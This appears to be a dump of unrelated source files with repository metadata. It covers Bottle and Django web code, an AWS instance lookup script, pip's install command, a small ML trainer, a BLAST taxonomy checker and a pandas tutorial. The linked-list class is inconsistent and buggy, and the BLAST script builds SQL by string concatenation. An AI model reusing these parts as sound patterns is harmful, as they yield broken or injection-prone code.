    value = request.query.value
    if value:
        send_data('lcd_p', value)
    else:
        return read_data('lcd_p')
@route('/raspberrypi2/buzzer', method='GET')
def write_buzzer_p():
    """GET /raspberrypi2/buzzer?value=... — drive the Pi buzzer (write-only).

    Bug fix: this handler previously targeted 'button_p', so buzzer
    commands were written to the button resource instead of the buzzer.
    Every other handler pairs its route with the matching resource name.
    """
    name = 'buzzer_p'
    value = request.query.value
    if value:
        send_data(name, value)
@route('/raspberrypi2/button', method='GET')
def read_button_p():
    """GET /raspberrypi2/button — current state of the Pi push button."""
    return read_data('button_p')
@route('/raspberrypi2/ultrasonic', method='GET')
def read_ultrasonic_p():
    """GET /raspberrypi2/ultrasonic — ultrasonic ranger reading from the Pi."""
    return read_data('sensor_p_ultrasonic')
@route('/arduino/')
def list_device_a():
    """Index route for the Arduino device tree."""
    return "For arduino control"
@route('/arduino/led', method='GET')
def read_led_a():
    """GET /arduino/led — read the LED state, or set it via ?value=."""
    value = request.query.value
    if value:
        send_data('led_a', value)
    else:
        return read_data('led_a')
@route('/arduino/lcd', method='GET')
def read_lcd_a():
    """GET /arduino/lcd — read the Arduino LCD text, or set it via ?value=."""
    value = request.query.value
    if value:
        send_data('lcd_a', value)
    else:
        return read_data('lcd_a')
@route('/arduino/buzzer', method='GET')
def read_buzzer_a():
    """GET /arduino/buzzer?value=... — drive the Arduino buzzer (write-only)."""
    value = request.query.value
    if value:
        send_data('buzzer_a', value)
@route('/arduino/button', method='GET')
def read_button_a():
    """GET /arduino/button — current state of the Arduino push button."""
    return read_data('button_a')
@route('/arduino/touch', method='GET')
def read_touch_a():
    """GET /arduino/touch — current state of the Arduino touch sensor."""
    return read_data('touch_a')
# Serve the REST API on localhost:5566 (blocking call).
run(host='localhost', port=5566, debug=True)
| [
"gerald.yang@canonical.com"
] | gerald.yang@canonical.com |
deee523d6c83e8a7be439c8b330ff4bdc6289531 | babe4f137193012d4d31107411b91295eaae631c | /teams/admin.py | f407e791e330c818d8517df00259ca7f97b5e624 | [] | no_license | dev-yohan/football_bets | 31829f73e9b9b3780c2bb32825c62456f39eb025 | fc5215ebca1bc9c31529a58fc5d66b92d49412c9 | refs/heads/master | 2021-01-19T10:42:30.241938 | 2014-10-02T21:56:02 | 2014-10-02T21:56:02 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 162 | py | from django.contrib import admin
# Register your models here.
from teams.models import Team, TeamPhoto
# Expose Team and TeamPhoto in the Django admin with default ModelAdmin options.
admin.site.register(Team)
admin.site.register(TeamPhoto)
"yohanmorales@hotmail.com"
] | yohanmorales@hotmail.com |
2b9e767ea703a2e1d71f9537fdde748a266f4054 | 9652bfcb74c913471ff22fe2d5cea734e3bd3b4d | /snippets/models.py | 55526d87a08d9b00859909dfc4d42378aa5b21a3 | [] | no_license | brandoshmando/api-practice | de4037a64b244d3cfeae688e8a63e4ab2f72a1dd | 9811c74dcf3a335a4899fb716e580082efb8464a | refs/heads/master | 2021-01-01T05:30:21.046513 | 2014-12-04T19:10:54 | 2014-12-04T19:10:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,592 | py | from django.db import models
from pygments.lexers import get_all_lexers, get_lexer_by_name
from pygments.styles import get_all_styles
from pygments.formatters.html import HtmlFormatter
from pygments import highlight
LEXERS = [item for item in get_all_lexers() if item[1]]
LANGUAGE_CHOICES = sorted([(item[1][0], item[0]) for item in LEXERS])
STYLE_CHOICES = sorted((item,item) for item in get_all_styles())
class Snippet(models.Model):
    """A stored code snippet with a pygments-rendered HTML copy.

    On save, ``code`` is highlighted according to the snippet's language,
    style and line-number settings and cached in ``highlighted``.
    """
    created = models.DateTimeField(auto_now_add=True)
    title = models.CharField(max_length=100, blank=True, default='')
    code = models.TextField()
    linenos = models.BooleanField(default=False)
    language = models.CharField(choices=LANGUAGE_CHOICES,
                                default='python',
                                max_length=100)
    style = models.CharField(choices=STYLE_CHOICES,
                             default='friendly',
                             max_length=100)
    owner = models.ForeignKey('auth.User', related_name='snippets')
    highlighted = models.TextField()
    class Meta:
        ordering = ('created',)
    def __unicode__(self):
        return self.title
    def save(self, *args, **kwargs):
        """
        Use the 'pygments' library to create a highlighted section of the code snippet
        """
        lexer = get_lexer_by_name(self.language)
        # Conditional expressions replace the old `x and y or z` trick,
        # which silently misbehaves when the truthy branch is itself falsy.
        linenos = 'table' if self.linenos else False
        options = {'title': self.title} if self.title else {}
        formatter = HtmlFormatter(style=self.style, linenos=linenos, full=True, **options)
        self.highlighted = highlight(self.code, lexer, formatter)
        super(Snippet, self).save(*args, **kwargs)
"brancraft@gmail.com"
] | brancraft@gmail.com |
4931a443320347645e710cbea6266b44e13b80be | 59303d668ccf4126deb9c18c254a4ccc36e7b39f | /app/core/tests/test_commands.py | cc84d9ab8956b94e14493543f7196557d7ddba11 | [
"MIT"
] | permissive | tp00012x/playground | 708cb8ce8900ec65a1c8b3fc329397b79d8a415e | a4d22ad812ac8f45996f767b87130ba41ec69154 | refs/heads/master | 2021-09-24T19:13:31.885114 | 2020-02-07T23:11:28 | 2020-02-07T23:20:50 | 213,700,804 | 0 | 0 | MIT | 2021-09-22T18:01:04 | 2019-10-08T16:54:15 | Python | UTF-8 | Python | false | false | 687 | py | from unittest.mock import patch
from django.core.management import call_command
from django.db.utils import OperationalError
from django.test import TestCase
class CommandTests(TestCase):
    """Tests for the custom `wait_for_db` management command."""
    @patch('django.db.utils.ConnectionHandler.__getitem__')
    def test_wait_for_db_ready(self, gi):
        """When the DB is already available, the command checks it once."""
        gi.return_value = True
        call_command('wait_for_db')
        self.assertEqual(gi.call_count, 1)
    @patch('django.db.utils.ConnectionHandler.__getitem__')
    @patch('time.sleep', return_value=True)
    def test_wait_for_db(self, ts, gi):
        """The command retries until the DB comes up: 5 failures, then success.

        time.sleep is patched out so the retry loop doesn't slow the test.
        """
        gi.side_effect = [OperationalError] * 5 + [True]
        call_command('wait_for_db')
        self.assertEqual(gi.call_count, 6)
| [
"anthony_torres01@yahoo.com"
] | anthony_torres01@yahoo.com |
830e286274014b2ff90220d36601f1a1b0eb253a | 1dedbb7bdb2822668838194f9adc8f2b0d9f629f | /mbta_departures/departures/migrations/0002_auto_20160823_2159.py | a7811666ee1d52817db44ebf58306b662952b09f | [] | no_license | mbc1990/mbta-departures | ce689371fa68a2bd72e6a68299c7bc746210f22a | 923a59dfe8346978a157600b21885d443ae0182d | refs/heads/master | 2020-09-17T04:43:52.189341 | 2016-08-26T14:10:04 | 2016-08-26T14:10:04 | 66,392,832 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 442 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.10 on 2016-08-23 21:59
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated by Django 1.10: makes Departure.track nullable
    # (IntegerField(null=True)).
    dependencies = [
        ('departures', '0001_initial'),
    ]
    operations = [
        migrations.AlterField(
            model_name='departure',
            name='track',
            field=models.IntegerField(null=True),
        ),
    ]
| [
"mbalchcr@oberlin.edu"
] | mbalchcr@oberlin.edu |
e59cd9e09e8d6164ac0af82e2ef6a000c9621621 | 09e4f72af3356544bb56ffaa62ba85000fbe8b92 | /venv/Lib/site-packages/pip-10.0.1-py3.7.egg/pip/_internal/commands/install.py | 2d63579913858736448af3822bfecf4445c2c38b | [] | no_license | myjiangxiuhan/auto | e8e2e796507268c8536046a36f43c1fcdbabe0fb | 40180fb827e4018db6495c7052e3b5c3d9c90020 | refs/heads/master | 2020-04-29T16:26:59.251023 | 2019-03-18T10:39:17 | 2019-03-18T10:39:17 | 176,260,537 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 19,770 | py | from __future__ import absolute_import
import errno
import logging
import operator
import os
import shutil
from optparse import SUPPRESS_HELP
from pip._internal import cmdoptions
from pip._internal.basecommand import RequirementCommand
from pip._internal.cache import WheelCache
from pip._internal.exceptions import (
CommandError, InstallationError, PreviousBuildDirError,
)
from pip._internal.locations import distutils_scheme, virtualenv_no_global
from pip._internal.operations.check import check_install_conflicts
from pip._internal.operations.prepare import RequirementPreparer
from pip._internal.req import RequirementSet, install_given_reqs
from pip._internal.resolve import Resolver
from pip._internal.status_codes import ERROR
from pip._internal.utils.filesystem import check_path_owner
from pip._internal.utils.misc import ensure_dir, get_installed_version
from pip._internal.utils.temp_dir import TempDirectory
from pip._internal.wheel import WheelBuilder
try:
import wheel
except ImportError:
wheel = None
logger = logging.getLogger(__name__)
class InstallCommand(RequirementCommand):
"""
Install packages from:
- PyPI (and other indexes) using requirement specifiers.
- VCS project urls.
- Local project directories.
- Local or remote source archives.
pip also supports installing from "requirements files", which provide
an easy way to specify a whole environment to be installed.
"""
name = 'install'
usage = """
%prog [options] <requirement specifier> [package-index-options] ...
%prog [options] -r <requirements file> [package-index-options] ...
%prog [options] [-e] <vcs project url> ...
%prog [options] [-e] <local project path> ...
%prog [options] <archive url/path> ..."""
summary = 'Install packages.'
def __init__(self, *args, **kw):
super(InstallCommand, self).__init__(*args, **kw)
cmd_opts = self.cmd_opts
cmd_opts.add_option(cmdoptions.requirements())
cmd_opts.add_option(cmdoptions.constraints())
cmd_opts.add_option(cmdoptions.no_deps())
cmd_opts.add_option(cmdoptions.pre())
cmd_opts.add_option(cmdoptions.editable())
cmd_opts.add_option(
'-t', '--target',
dest='target_dir',
metavar='dir',
default=None,
help='Install packages into <dir>. '
'By default this will not replace existing files/folders in '
'<dir>. Use --upgrade to replace existing packages in <dir> '
'with new versions.'
)
cmd_opts.add_option(
'--user',
dest='use_user_site',
action='store_true',
help="Install to the Python user install directory for your "
"platform. Typically ~/.local/, or %APPDATA%\\Python on "
"Windows. (See the Python documentation for site.USER_BASE "
"for full details.)")
cmd_opts.add_option(
'--no-user',
dest='use_user_site',
action='store_false',
help=SUPPRESS_HELP)
cmd_opts.add_option(
'--root',
dest='root_path',
metavar='dir',
default=None,
help="Install everything relative to this alternate root "
"directory.")
cmd_opts.add_option(
'--prefix',
dest='prefix_path',
metavar='dir',
default=None,
help="Installation prefix where lib, bin and other top-level "
"folders are placed")
cmd_opts.add_option(cmdoptions.build_dir())
cmd_opts.add_option(cmdoptions.src())
cmd_opts.add_option(
'-U', '--upgrade',
dest='upgrade',
action='store_true',
help='Upgrade all specified packages to the newest available '
'version. The handling of dependencies depends on the '
'upgrade-strategy used.'
)
cmd_opts.add_option(
'--upgrade-strategy',
dest='upgrade_strategy',
default='only-if-needed',
choices=['only-if-needed', 'eager'],
help='Determines how dependency upgrading should be handled '
'[default: %default]. '
'"eager" - dependencies are upgraded regardless of '
'whether the currently installed version satisfies the '
'requirements of the upgraded package(s). '
'"only-if-needed" - are upgraded only when they do not '
'satisfy the requirements of the upgraded package(s).'
)
cmd_opts.add_option(
'--force-reinstall',
dest='force_reinstall',
action='store_true',
help='Reinstall all packages even if they are already '
'up-to-date.')
cmd_opts.add_option(
'-I', '--ignore-installed',
dest='ignore_installed',
action='store_true',
help='Ignore the installed packages (reinstalling instead).')
cmd_opts.add_option(cmdoptions.ignore_requires_python())
cmd_opts.add_option(cmdoptions.no_build_isolation())
cmd_opts.add_option(cmdoptions.install_options())
cmd_opts.add_option(cmdoptions.global_options())
cmd_opts.add_option(
"--compile",
action="store_true",
dest="compile",
default=True,
help="Compile Python source files to bytecode",
)
cmd_opts.add_option(
"--no-compile",
action="store_false",
dest="compile",
help="Do not compile Python source files to bytecode",
)
cmd_opts.add_option(
"--no-warn-scripts-location",
action="store_false",
dest="warn_script_location",
default=True,
help="Do not warn when installing scripts outside PATH",
)
cmd_opts.add_option(
"--no-warn-conflicts",
action="store_false",
dest="warn_about_conflicts",
default=True,
help="Do not warn about broken dependencies",
)
cmd_opts.add_option(cmdoptions.no_binary())
cmd_opts.add_option(cmdoptions.only_binary())
cmd_opts.add_option(cmdoptions.no_clean())
cmd_opts.add_option(cmdoptions.require_hashes())
cmd_opts.add_option(cmdoptions.progress_bar())
index_opts = cmdoptions.make_option_group(
cmdoptions.index_group,
self.parser,
)
self.parser.insert_option_group(0, index_opts)
self.parser.insert_option_group(0, cmd_opts)
def run(self, options, args):
cmdoptions.check_install_build_global(options)
upgrade_strategy = "to-satisfy-only"
if options.upgrade:
upgrade_strategy = options.upgrade_strategy
if options.build_dir:
options.build_dir = os.path.abspath(options.build_dir)
options.src_dir = os.path.abspath(options.src_dir)
install_options = options.install_options or []
if options.use_user_site:
if options.prefix_path:
raise CommandError(
"Can not combine '--user' and '--prefix' as they imply "
"different installation locations"
)
if virtualenv_no_global():
raise InstallationError(
"Can not perform a '--user' install. User site-packages "
"are not visible in this virtualenv."
)
install_options.append('--user')
install_options.append('--prefix=')
target_temp_dir = TempDirectory(kind="target")
if options.target_dir:
options.ignore_installed = True
options.target_dir = os.path.abspath(options.target_dir)
if (os.path.exists(options.target_dir) and not
os.path.isdir(options.target_dir)):
raise CommandError(
"Target path exists but is not a directory, will not "
"continue."
)
# Create a target directory for using with the target option
target_temp_dir.create()
install_options.append('--home=' + target_temp_dir.path)
global_options = options.global_options or []
with self._build_session(options) as session:
finder = self._build_package_finder(options, session)
build_delete = (not (options.no_clean or options.build_dir))
wheel_cache = WheelCache(options.cache_dir, options.format_control)
if options.cache_dir and not check_path_owner(options.cache_dir):
logger.warning(
"The directory '%s' or its parent directory is not owned "
"by the current user and caching wheels has been "
"disabled. check the permissions and owner of that "
"directory. If executing pip with sudo, you may want "
"sudo's -H flag.",
options.cache_dir,
)
options.cache_dir = None
with TempDirectory(
options.build_dir, delete=build_delete, kind="install"
) as directory:
requirement_set = RequirementSet(
require_hashes=options.require_hashes,
)
try:
self.populate_requirement_set(
requirement_set, args, options, finder, session,
self.name, wheel_cache
)
preparer = RequirementPreparer(
build_dir=directory.path,
src_dir=options.src_dir,
download_dir=None,
wheel_download_dir=None,
progress_bar=options.progress_bar,
build_isolation=options.build_isolation,
)
resolver = Resolver(
preparer=preparer,
finder=finder,
session=session,
wheel_cache=wheel_cache,
use_user_site=options.use_user_site,
upgrade_strategy=upgrade_strategy,
force_reinstall=options.force_reinstall,
ignore_dependencies=options.ignore_dependencies,
ignore_requires_python=options.ignore_requires_python,
ignore_installed=options.ignore_installed,
isolated=options.isolated_mode,
)
resolver.resolve(requirement_set)
# If caching is disabled or wheel is not installed don't
# try to build wheels.
if wheel and options.cache_dir:
# build wheels before install.
wb = WheelBuilder(
finder, preparer, wheel_cache,
build_options=[], global_options=[],
)
# Ignore the result: a failed wheel will be
# installed from the sdist/vcs whatever.
wb.build(
requirement_set.requirements.values(),
session=session, autobuilding=True
)
to_install = resolver.get_installation_order(
requirement_set
)
# Consistency Checking of the package set we're installing.
should_warn_about_conflicts = (
not options.ignore_dependencies and
options.warn_about_conflicts
)
if should_warn_about_conflicts:
self._warn_about_conflicts(to_install)
# Don't warn about scripts install locations if
# --target has been specified
warn_script_location = options.warn_script_location
if options.target_dir:
warn_script_location = False
installed = install_given_reqs(
to_install,
install_options,
global_options,
root=options.root_path,
home=target_temp_dir.path,
prefix=options.prefix_path,
pycompile=options.compile,
warn_script_location=warn_script_location,
use_user_site=options.use_user_site,
)
possible_lib_locations = get_lib_location_guesses(
user=options.use_user_site,
home=target_temp_dir.path,
root=options.root_path,
prefix=options.prefix_path,
isolated=options.isolated_mode,
)
reqs = sorted(installed, key=operator.attrgetter('name'))
items = []
for req in reqs:
item = req.name
try:
installed_version = get_installed_version(
req.name, possible_lib_locations
)
if installed_version:
item += '-' + installed_version
except Exception:
pass
items.append(item)
installed = ' '.join(items)
if installed:
logger.info('Successfully installed %s', installed)
except EnvironmentError as error:
show_traceback = (self.verbosity >= 1)
message = create_env_error_message(
error, show_traceback, options.use_user_site,
)
logger.error(message, exc_info=show_traceback)
return ERROR
except PreviousBuildDirError:
options.no_clean = True
raise
finally:
# Clean up
if not options.no_clean:
requirement_set.cleanup_files()
wheel_cache.cleanup()
if options.target_dir:
self._handle_target_dir(
options.target_dir, target_temp_dir, options.upgrade
)
return requirement_set
def _handle_target_dir(self, target_dir, target_temp_dir, upgrade):
ensure_dir(target_dir)
# Checking both purelib and platlib directories for installed
# packages to be moved to target directory
lib_dir_list = []
with target_temp_dir:
# Checking both purelib and platlib directories for installed
# packages to be moved to target directory
scheme = distutils_scheme('', home=target_temp_dir.path)
purelib_dir = scheme['purelib']
platlib_dir = scheme['platlib']
data_dir = scheme['data']
if os.path.exists(purelib_dir):
lib_dir_list.append(purelib_dir)
if os.path.exists(platlib_dir) and platlib_dir != purelib_dir:
lib_dir_list.append(platlib_dir)
if os.path.exists(data_dir):
lib_dir_list.append(data_dir)
for lib_dir in lib_dir_list:
for item in os.listdir(lib_dir):
if lib_dir == data_dir:
ddir = os.path.join(data_dir, item)
if any(s.startswith(ddir) for s in lib_dir_list[:-1]):
continue
target_item_dir = os.path.join(target_dir, item)
if os.path.exists(target_item_dir):
if not upgrade:
logger.warning(
'Target directory %s already exists. Specify '
'--upgrade to force replacement.',
target_item_dir
)
continue
if os.path.islink(target_item_dir):
logger.warning(
'Target directory %s already exists and is '
'a link. Pip will not automatically replace '
'links, please remove if replacement is '
'desired.',
target_item_dir
)
continue
if os.path.isdir(target_item_dir):
shutil.rmtree(target_item_dir)
else:
os.remove(target_item_dir)
shutil.move(
os.path.join(lib_dir, item),
target_item_dir
)
def _warn_about_conflicts(self, to_install):
package_set, _dep_info = check_install_conflicts(to_install)
missing, conflicting = _dep_info
# NOTE: There is some duplication here from pip check
for project_name in missing:
version = package_set[project_name][0]
for dependency in missing[project_name]:
logger.critical(
"%s %s requires %s, which is not installed.",
project_name, version, dependency[1],
)
for project_name in conflicting:
version = package_set[project_name][0]
for dep_name, dep_version, req in conflicting[project_name]:
logger.critical(
"%s %s has requirement %s, but you'll have %s %s which is "
"incompatible.",
project_name, version, req, dep_name, dep_version,
)
def get_lib_location_guesses(*args, **kwargs):
    """Return the purelib and platlib paths for the given distutils scheme."""
    locations = distutils_scheme('', *args, **kwargs)
    return [locations['purelib'], locations['platlib']]
def create_env_error_message(error, show_traceback, using_user_site):
    """Format an error message for an EnvironmentError.

    It may occur anytime during the execution of the install command.
    With *show_traceback* the error text itself is omitted (the traceback
    is logged separately); for EACCES a remediation hint is appended.
    """
    if show_traceback:
        message = "Could not install packages due to an EnvironmentError.\n"
    else:
        message = "Could not install packages due to an EnvironmentError: %s\n" % error
    # Suggest useful actions to the user:
    # (1) using user site-packages or (2) verifying the permissions
    if error.errno == errno.EACCES:
        if using_user_site:
            message += "Check the permissions.\n"
        else:
            message += ("Consider using the `--user` option"
                        " or check the permissions.\n")
    return message.strip() + "\n"
| [
"my.jiangxiuhan@gmail.com"
] | my.jiangxiuhan@gmail.com |
43f8fa5dff5e58c84f01d534064729fb4c6cf333 | 9b249900af551d5ddbac664c15d4d0fc52432bea | /masterips | 6b63e100388de08fefbb2301d0e31002110c7fb5 | [] | no_license | faskiri/jupyterhub | 9960ab1fbc8039e88204b1425b32a057ed353c05 | 1244770f90da1c6050b29a090ac5d7bddf6a0ad4 | refs/heads/master | 2021-05-12T15:50:53.581028 | 2018-01-08T13:44:36 | 2018-01-10T18:27:50 | 116,994,965 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 913 | #!/usr/bin/env python
import subprocess
import json
def master_instances():
data = subprocess.check_output('aws cloudformation describe-stacks --stack-name JupyterHubStack'.split())
stack_id = None
for s in json.loads(data)['Stacks']:
stack_id = s['StackId']
break
data = subprocess.check_output([
'aws',
'ec2',
'describe-instances',
'--filters',
'Name=tag:aws:cloudformation:stack-id,Values=%s' % stack_id,
'Name=tag:swarm-node-type,Values=manager'
])
parsed = json.loads(data)
instances = []
for r in parsed['Reservations']:
for i in r['Instances']:
instances.append(i)
return instances
def master_ips():
ips = []
for mi in master_instances():
ips.append(mi['PublicIpAddress'])
return ips
if __name__ == '__main__':
for i in master_ips():
print i
| [
"faskiri@instartlogic.com"
] | faskiri@instartlogic.com | |
43d6164aebe7ebe405d45276d7a31bdb92e91173 | 273d950a3d07c3e39609893e2993fc7c0ffe91a5 | /app_trainer.py | 1a8f3efd740bd69187addb0bfd2e3d39adc0b249 | [] | no_license | ruralkan/machinelearningwebservices | 39912c75f7e67be93499c1244735e0227ecb008e | 3151d83dfa9bc334d87ad9367feffed3f0257385 | refs/heads/master | 2020-06-27T11:03:24.339744 | 2019-07-31T22:10:31 | 2019-07-31T22:10:31 | 199,935,218 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 682 | py | # Trains model on data and save it
# Model random forest classifier
# The pickle module implements binary protocols for serializing
# and de-serializing a Python object structure.
import pickle
import numpy as np
from util import get_data
from sklearn.ensemble import RandomForestClassifier
if __name__ == '__main__':
    X, Y = get_data()
    # NOTE(review): only the FIRST quarter of the data is used for training;
    # the remaining 75% is the held-out score below — confirm intended split.
    Ntrain = len(Y) // 4
    Xtrain, Ytrain = X[:Ntrain], Y[:Ntrain]
    model = RandomForestClassifier()
    model.fit(Xtrain, Ytrain)
    # just in case you're curious
    Xtest, Ytest = X[Ntrain:], Y[Ntrain:]
    print("test accuracy:", model.score(Xtest, Ytest))
    # Serialize the fitted model to disk.
    with open('mymodel.pkl', 'wb') as f:
        pickle.dump(model, f)
"ruralkan@gmail.com"
] | ruralkan@gmail.com |
56cfe94c34974098be5441d30e82c556d53a814e | 86a017dd4c8d4d77c511cc598190aaa9dc0ae3e8 | /data structure/mine_linked_list.py | 92ff136a59524e8fa5ebb2031ddd83e8e998da40 | [] | no_license | sungguenja/studying | fd7459eb9faa6488d7b63bf3884a92513daf3c54 | 719f4dfbda211c34de2a0c8cf3b9d3001f29fcec | refs/heads/master | 2023-08-17T13:46:44.343780 | 2023-08-10T11:55:15 | 2023-08-10T11:55:15 | 232,306,053 | 0 | 0 | null | 2022-12-16T10:53:26 | 2020-01-07T11:00:28 | Python | UTF-8 | Python | false | false | 1,711 | py | import mine_node
class LinkedList:
def __init__(self):
self.head = None
def isEmpty(self):
return self.top == None
def clear(self):
self.top = None
def push(self,item):
now_node = mine_node.Node(item,self.top)
self.top = now_node
def size(self):
node = self.top
count = 0
while node != None:
count += 1
node = node.link
return count
def getNode(self,position):
if position<0:
return None
node = self.head
while position>0 and node != None:
node = node.link
position -= 1
return node
def getValue(self,position):
node = self.getNode(position)
if node == None:
return None
else:
return node.data
def replace(self,item,position):
node = self.getNode(position)
if node != None:
node.data = item
def find(self,data):
node = self.head
while node != None:
if node.data == data:
break
node = node.link
return node
def insert(self,position,data):
node = self.getNode(position-1)
if node == None:
self.head = mine_node.Node(data,self.head)
else:
insert_node = mine_node.Node(data,node.link)
node.link = insert_node
def delete(self,position):
node = self.getNode(position-1)
if node != None:
if self.head != None:
self.head = self.head.link
elif node.link != None:
node.link = node.link.link | [
"59605197+sungguenja@users.noreply.github.com"
] | 59605197+sungguenja@users.noreply.github.com |
4724d5aa9415a81ce783f5bab5bea5842e84c4e9 | 217440fcc3a91e4ad1a8e008bd315128de7d571a | /day11/08-常见类的函数.py | 9a1178d3e15539060839c925447403eea8ccf73c | [] | no_license | zhangbo111/0102-0917 | a6af056ce9c9a8ab9500e8d016846dc6c50ec1c6 | 1631ea402612e82ae62b093749e2c4f19a021c63 | refs/heads/master | 2020-04-18T16:55:41.675156 | 2019-02-12T01:48:25 | 2019-02-12T01:48:25 | 167,643,635 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 457 | py | class Father:
pass
class Mother:
pass
class Laowang:
pass
class Son(Father, Mother):
pass
# 检测一个类是否是另外一个类的子类 如果是返回True 否 False
result1 = issubclass(Son, Father)
result2 = issubclass(Son, Mother)
result3 = issubclass(Son, Laowang)
# 检测Son类是否是Mother类或者Laowang类的子类 满足一个就可以
result4 = issubclass(Son, (Mother, Laowang))
print(result1, result2, result3, result4)
| [
"13349949963@163.com"
] | 13349949963@163.com |
25d996f06fce63fdbea1b90a502572653b8d3692 | fb1ede53fd30ad5350bfd705c6f64f455f8a61e3 | /blast_relatedness_parse.py | c953952a9b7771674f5f1145879293116b877e35 | [] | no_license | sunray1/working_scripts | a8110db5ebafd95606d52b3c8f8406321007b892 | a603ff6d94756d3516d236b4539f67b31d9e84c7 | refs/heads/master | 2022-09-14T08:48:49.751370 | 2022-09-13T02:32:30 | 2022-09-13T02:32:30 | 130,236,320 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,948 | py | #!/usr/bin/python
#script takes self blast output and uses the GI numbers to look up
#in the sql blast database and make sure they're in the same family
# ./script.py blastsql taxodatabase blastout
import os, sys, sqlite3
# Open the BLAST hit database (argv[1]) and attach the taxonomy database
# (argv[2]) so both can be queried through the same cursor.
# NOTE(review): argv values are spliced into SQL strings directly — fine
# for a trusted command line, but not injection-safe in general.
conn = sqlite3.connect(sys.argv[1])
c = conn.cursor()
c.execute("ATTACH '" + sys.argv[2] + "' as 'db'")
hit_dic = {}
count = 0
# make a dictionary with target and query GIs from self blast
# (pipe-delimited BLAST line: field 1 = query GI, field 5 = hit GI)
with open(sys.argv[3]) as o:
    line = o.readline()
    while line:
        hit_dic[line.split("|")[1]] = line.split("|")[5]
        line = o.readline()
# get the family for each match
# gets genus from blastsql, then uses while loop to loop up to family in taxodatabase
with open(sys.argv[3].split(".")[0] + '_errors.txt', 'w') as o:
    for i in hit_dic:
        count += 1
        count2 = 0
        count3 = 0
        query_rank = ''
        target_rank = ''
        for iter in c.execute("SELECT Species FROM blast WHERE GI='" + i + "'"):
            query_taxa = iter[0]
        # have to keep counts in case something is wrong with sql and it never find the family
        # (each pass walks one step up the taxonomy: name -> parent concept)
        while query_rank != 'Family' and count2 < 10:
            for iter in c.execute("SELECT n2.namestr, r2.namestr FROM names n1, names_to_taxonconcepts ntt1, taxon_concepts tc1, taxon_concepts tc2, names_to_taxonconcepts ntt2, names n2, ranks r2 WHERE n1.name_id=ntt1.name_id AND ntt1.tc_id=tc1.tc_id AND tc1.parent_id=tc2.tc_id AND ntt2.tc_id=tc2.tc_id AND n2.name_id=ntt2.name_id AND tc2.rank_id = r2.rank_id AND n1.namestr='"+query_taxa+"' GROUP BY n2.namestr, r2.namestr"):
                query_taxa = str(iter[0])
                query_rank = str(iter[1])
            count2 += 1
        if count2 == 10:
            o.write('ERROR WITH ' + str(i) + '/' + str(hit_dic[i])+'\n')
        for iter in c.execute("SELECT Species FROM blast WHERE GI='" + hit_dic[i] + "'"):
            target_taxa = iter[0]
        while target_rank != 'Family' and count3 < 10:
            for iter in c.execute("SELECT n2.namestr, r2.namestr FROM names n1, names_to_taxonconcepts ntt1, taxon_concepts tc1, taxon_concepts tc2, names_to_taxonconcepts ntt2, names n2, ranks r2 WHERE n1.name_id=ntt1.name_id AND ntt1.tc_id=tc1.tc_id AND tc1.parent_id=tc2.tc_id AND ntt2.tc_id=tc2.tc_id AND n2.name_id=ntt2.name_id AND tc2.rank_id = r2.rank_id AND n1.namestr='"+target_taxa+"' GROUP BY n2.namestr, r2.namestr"):
                target_taxa = str(iter[0])
                target_rank = str(iter[1])
            count3 += 1
        if count3 == 10:
            o.write('ERROR WITH ' + str(hit_dic[i]) + '/' + str(i)+'\n')
        # Progress indicator: percent of hit pairs processed so far.
        print(round((float(count)/float(len(hit_dic.keys())))*100, 2))
        # if the families are not the same between the query and the hit, print
        if query_taxa != target_taxa and count2 != 10 and count3 != 10:
            o.write(i+' '+query_taxa+' '+hit_dic[i]+' '+target_taxa+'\n')
conn.close()
"sunray1@bellsouth.net"
] | sunray1@bellsouth.net |
54a251f30b2601ed672edae210098571b0c30163 | e0542daed886c1b9ba6e92759be4b878ef116ff1 | /1장_공부.py | c17e388d008f38e88f90e2c4d89ff63a68723012 | [] | no_license | lemontree0626/python_study | fb25b39c7be3848ee8903fd4214c0cfbf6c04a81 | 30b2a1373b6f2681f5f7a7e4cae5f5c290ff7948 | refs/heads/master | 2020-08-07T02:53:05.314596 | 2019-10-14T08:18:52 | 2019-10-14T08:18:52 | 213,269,787 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 19,602 | py |
# coding: utf-8
# # 1.1 CCTV 현황과 인구 현황 데이터 구하기
# * 서울시 자치구 연도별 CCTV 설치 현황 사이트
# * 서울시 서울통계 사이트
# # 1.2 파이썬에서 텍스트 파일과 엑셀 파일 읽기 -pandas
# In[40]:
# 모듈 불러오기
import pandas as pd
# In[41]:
# csv 파일 불러오기
CCTV_Seoul = pd.read_csv("../data/01. CCTV_in_Seoul.csv", encoding = "utf-8")
CCTV_Seoul.head()
# In[42]:
#CCTV_Seoul 데이터 끝 부분 확인
CCTV_Seoul.tail()
# In[43]:
#column(열) 확인
CCTV_Seoul.columns
# In[44]:
#column를 인덱스로 확인 가능
CCTV_Seoul.columns[0] #0:기관명, 1:소계, 2:2013년도 이전, 3:2014년, 4:2015년, 5:2016년
# In[45]:
#column의 이름 변경(rename)
CCTV_Seoul.rename(columns={CCTV_Seoul.columns[0]: "구별"}, inplace=True)#inplace=True:변수의 내용을 갱신해라
#{CCTV_Seoul.columns[0]:기관명 -> rename:구별
CCTV_Seoul.head()
# In[46]:
#excel 파일 불러오기
pop_Seoul = pd.read_excel("../data/01. population_in_Seoul.xls",encoding="utf-8")
pop_Seoul.head()
# In[47]:
#excel 파일 불러오기(옵션 적용)
pop_Seoul = pd.read_excel("../data/01. population_in_Seoul.xls",
header = 2, #세번째 줄부터 읽어라(파이썬은 0부터 시작한다)
usecols = "B, D, G, J, N", #엑셀의 B열, D열, G열, J열, N열만 골라서 불러와라(parse_cols->usecols)
encoding="utf-8")
pop_Seoul.head()
# In[48]:
#rename으로 이름 변경
pop_Seoul.rename(columns={pop_Seoul.columns[0] : "구별",
pop_Seoul.columns[1] : "인구수",
pop_Seoul.columns[2] : "한국인",
pop_Seoul.columns[3] : "외국인",
